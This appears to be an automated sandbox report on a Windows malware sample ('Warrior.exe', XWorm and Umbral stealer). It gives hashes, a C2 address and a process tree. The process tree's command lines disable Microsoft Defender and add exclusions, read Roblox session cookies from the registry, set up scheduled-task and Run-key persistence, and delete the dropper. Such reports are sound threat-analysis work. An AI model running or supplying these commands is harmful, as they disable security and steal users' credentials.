Analysis
- max time kernel: 147s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20240226-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 28-04-2024 22:43
- Static task: static1
General
- Target: Warrior.exe
- Size: 3.0MB
- MD5: 77af0ed58685722c2f9596fed1e5bd84
- SHA1: 0a09622ffbc63932f11af84934d256d5e790ffeb
- SHA256: 0545c17e579fc2df5185855e51425ec4d32da26075c02a0cf1af0221aa9b9a18
- SHA512: e557de1d3a4115276520ed5775c7a6fb5688cf40021b62ed5243c03783d1ad09722190f0234006c16cb9978982541c4eabd6ffefbfc1d063d341d4cf620ff140
- SSDEEP: 3072:XVbxrc9pqjTrUWHdkxq+G3DmWuQk/moeRiR85MpMj:FbVQgzHkAyWunbje
Malware Config
Extracted
Family: xworm
- C2: accommodation-confidentiality.gl.at.ply.gg:19058
- Install_directory: %AppData%
- install_file: svhost.exe
Signatures
Detect Umbral payload 2 IoCs
- behavioral1/files/0x000800000002325b-7.dat (yara_rule: family_umbral)
- behavioral1/memory/536-22-0x000002A0FBD90000-0x000002A0FBDD0000-memory.dmp (yara_rule: family_umbral)
Detect Xworm Payload 2 IoCs
- behavioral1/files/0x000800000002325c-18.dat (yara_rule: family_xworm)
- behavioral1/memory/2424-29-0x0000000000C80000-0x0000000000C9A000-memory.dmp (yara_rule: family_xworm)
Drops file in Drivers directory 1 IoCs
- File opened for modification: C:\Windows\System32\drivers\etc\hosts (winadll.exe)
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation (Warrior.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation (WarriorX.exe)
Drops startup file 2 IoCs
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk (WarriorX.exe)
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk (WarriorX.exe)
Executes dropped EXE 4 IoCs
- PID 536 winadll.exe
- PID 2424 WarriorX.exe
- PID 2248 svhost.exe
- PID 2260 svhost.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Adds Run key to start application 2 TTPs 1 IoCs
- Set value (str): \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" (WarriorX.exe)
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
- flow 26: discord.com
- flow 27: discord.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow 17: ip-api.com
- flow 9: ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
- PID 2152 schtasks.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
- PID 3100 wmic.exe
Runs ping.exe 1 TTPs 1 IoCs
- PID 1796 PING.EXE
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 2356 powershell.exe 2356 powershell.exe 2356 powershell.exe 4480 powershell.exe 4480 powershell.exe 4480 powershell.exe 3760 powershell.exe 3760 powershell.exe 3760 powershell.exe 3308 powershell.exe 3308 powershell.exe 3308 powershell.exe 4464 powershell.exe 4464 powershell.exe 1964 powershell.exe 1964 powershell.exe 1964 powershell.exe 4464 powershell.exe 1200 powershell.exe 1200 powershell.exe 4824 powershell.exe 4824 powershell.exe 1200 powershell.exe 4824 powershell.exe 2424 WarriorX.exe 2424 WarriorX.exe 404 powershell.exe 404 powershell.exe 404 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2424 WarriorX.exe Token: SeDebugPrivilege 536 winadll.exe Token: SeDebugPrivilege 2356 powershell.exe Token: SeDebugPrivilege 4480 powershell.exe Token: SeDebugPrivilege 3760 powershell.exe Token: SeDebugPrivilege 3308 powershell.exe Token: SeDebugPrivilege 4464 powershell.exe Token: SeDebugPrivilege 1964 powershell.exe Token: SeDebugPrivilege 1200 powershell.exe Token: SeDebugPrivilege 4824 powershell.exe Token: SeIncreaseQuotaPrivilege 3472 wmic.exe Token: SeSecurityPrivilege 3472 wmic.exe Token: SeTakeOwnershipPrivilege 3472 wmic.exe Token: SeLoadDriverPrivilege 3472 wmic.exe Token: SeSystemProfilePrivilege 3472 wmic.exe Token: SeSystemtimePrivilege 3472 wmic.exe Token: SeProfSingleProcessPrivilege 3472 wmic.exe Token: SeIncBasePriorityPrivilege 3472 wmic.exe Token: SeCreatePagefilePrivilege 3472 wmic.exe Token: SeBackupPrivilege 3472 wmic.exe Token: SeRestorePrivilege 3472 wmic.exe Token: SeShutdownPrivilege 3472 wmic.exe Token: SeDebugPrivilege 3472 wmic.exe Token: SeSystemEnvironmentPrivilege 3472 wmic.exe Token: SeRemoteShutdownPrivilege 3472 wmic.exe Token: SeUndockPrivilege 3472 wmic.exe Token: SeManageVolumePrivilege 3472 wmic.exe Token: 33 3472 wmic.exe Token: 34 3472 wmic.exe Token: 35 3472 wmic.exe Token: 36 3472 wmic.exe Token: SeDebugPrivilege 2424 WarriorX.exe Token: SeIncreaseQuotaPrivilege 3472 wmic.exe Token: SeSecurityPrivilege 3472 wmic.exe Token: SeTakeOwnershipPrivilege 3472 wmic.exe Token: SeLoadDriverPrivilege 3472 wmic.exe Token: SeSystemProfilePrivilege 3472 wmic.exe Token: SeSystemtimePrivilege 3472 wmic.exe Token: SeProfSingleProcessPrivilege 3472 wmic.exe Token: SeIncBasePriorityPrivilege 3472 wmic.exe Token: SeCreatePagefilePrivilege 3472 wmic.exe Token: SeBackupPrivilege 3472 wmic.exe Token: SeRestorePrivilege 3472 wmic.exe Token: SeShutdownPrivilege 3472 wmic.exe Token: SeDebugPrivilege 3472 wmic.exe Token: SeSystemEnvironmentPrivilege 3472 wmic.exe Token: SeRemoteShutdownPrivilege 
3472 wmic.exe Token: SeUndockPrivilege 3472 wmic.exe Token: SeManageVolumePrivilege 3472 wmic.exe Token: 33 3472 wmic.exe Token: 34 3472 wmic.exe Token: 35 3472 wmic.exe Token: 36 3472 wmic.exe Token: SeIncreaseQuotaPrivilege 5000 wmic.exe Token: SeSecurityPrivilege 5000 wmic.exe Token: SeTakeOwnershipPrivilege 5000 wmic.exe Token: SeLoadDriverPrivilege 5000 wmic.exe Token: SeSystemProfilePrivilege 5000 wmic.exe Token: SeSystemtimePrivilege 5000 wmic.exe Token: SeProfSingleProcessPrivilege 5000 wmic.exe Token: SeIncBasePriorityPrivilege 5000 wmic.exe Token: SeCreatePagefilePrivilege 5000 wmic.exe Token: SeBackupPrivilege 5000 wmic.exe Token: SeRestorePrivilege 5000 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
- PID 2424 WarriorX.exe
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 4176 wrote to memory of 536 4176 Warrior.exe 91 PID 4176 wrote to memory of 536 4176 Warrior.exe 91 PID 4176 wrote to memory of 2424 4176 Warrior.exe 92 PID 4176 wrote to memory of 2424 4176 Warrior.exe 92 PID 536 wrote to memory of 4180 536 winadll.exe 93 PID 536 wrote to memory of 4180 536 winadll.exe 93 PID 536 wrote to memory of 2356 536 winadll.exe 97 PID 536 wrote to memory of 2356 536 winadll.exe 97 PID 2424 wrote to memory of 4480 2424 WarriorX.exe 99 PID 2424 wrote to memory of 4480 2424 WarriorX.exe 99 PID 536 wrote to memory of 3760 536 winadll.exe 101 PID 536 wrote to memory of 3760 536 winadll.exe 101 PID 2424 wrote to memory of 3308 2424 WarriorX.exe 103 PID 2424 wrote to memory of 3308 2424 WarriorX.exe 103 PID 2424 wrote to memory of 4464 2424 WarriorX.exe 105 PID 2424 wrote to memory of 4464 2424 WarriorX.exe 105 PID 536 wrote to memory of 1964 536 winadll.exe 107 PID 536 wrote to memory of 1964 536 winadll.exe 107 PID 536 wrote to memory of 1200 536 winadll.exe 109 PID 536 wrote to memory of 1200 536 winadll.exe 109 PID 2424 wrote to memory of 4824 2424 WarriorX.exe 111 PID 2424 wrote to memory of 4824 2424 WarriorX.exe 111 PID 2424 wrote to memory of 2152 2424 WarriorX.exe 113 PID 2424 wrote to memory of 2152 2424 WarriorX.exe 113 PID 536 wrote to memory of 3472 536 winadll.exe 115 PID 536 wrote to memory of 3472 536 winadll.exe 115 PID 536 wrote to memory of 5000 536 winadll.exe 117 PID 536 wrote to memory of 5000 536 winadll.exe 117 PID 536 wrote to memory of 4400 536 winadll.exe 119 PID 536 wrote to memory of 4400 536 winadll.exe 119 PID 536 wrote to memory of 404 536 winadll.exe 121 PID 536 wrote to memory of 404 536 winadll.exe 121 PID 536 wrote to memory of 3100 536 winadll.exe 123 PID 536 wrote to memory of 3100 536 winadll.exe 123 PID 536 wrote to memory of 4216 536 winadll.exe 125 PID 536 wrote to memory of 4216 536 winadll.exe 125 PID 4216 wrote to memory of 1796 4216 cmd.exe 127 PID 4216 wrote 
to memory of 1796 4216 cmd.exe 127 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Views/modifies file attributes 1 TTPs 1 IoCs
- PID 4180 attrib.exe
Processes
(process tree; nesting shows parent/child relationship)
- C:\Users\Admin\AppData\Local\Temp\Warrior.exe (PID 4176)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Warrior.exe"
  Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\winadll.exe (PID 536)
    Command line: "C:\Users\Admin\AppData\Local\Temp\winadll.exe"
    Signatures: Drops file in Drivers directory; Executes dropped EXE; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\SYSTEM32\attrib.exe (PID 4180)
      Command line: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\winadll.exe"
      Signatures: Views/modifies file attributes
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2356)
      Command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\winadll.exe'
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3760)
      Command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1964)
      Command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1200)
      Command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\Wbem\wmic.exe (PID 3472)
      Command line: "wmic.exe" os get Caption
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\Wbem\wmic.exe (PID 5000)
      Command line: "wmic.exe" computersystem get totalphysicalmemory
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\Wbem\wmic.exe (PID 4400)
      Command line: "wmic.exe" csproduct get uuid
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 404)
      Command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      Signatures: Suspicious behavior: EnumeratesProcesses
    - C:\Windows\System32\Wbem\wmic.exe (PID 3100)
      Command line: "wmic" path win32_VideoController get name
      Signatures: Detects videocard installed
    - C:\Windows\SYSTEM32\cmd.exe (PID 4216)
      Command line: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\winadll.exe" && pause
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\PING.EXE (PID 1796)
        Command line: ping localhost
        Signatures: Runs ping.exe
  - C:\Users\Admin\AppData\Local\Temp\WarriorX.exe (PID 2424)
    Command line: "C:\Users\Admin\AppData\Local\Temp\WarriorX.exe"
    Signatures: Checks computer location settings; Drops startup file; Executes dropped EXE; Adds Run key to start application; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4480)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WarriorX.exe'
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3308)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WarriorX.exe'
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4464)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4824)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\schtasks.exe (PID 2152)
      Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"
      Signatures: Creates scheduled task(s)
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5008)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1732 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:8
- C:\Users\Admin\AppData\Roaming\svhost.exe (PID 2248)
  Command line: C:\Users\Admin\AppData\Roaming\svhost.exe
  Signatures: Executes dropped EXE
- C:\Users\Admin\AppData\Roaming\svhost.exe (PID 2260)
  Command line: C:\Users\Admin\AppData\Roaming\svhost.exe
  Signatures: Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Downloads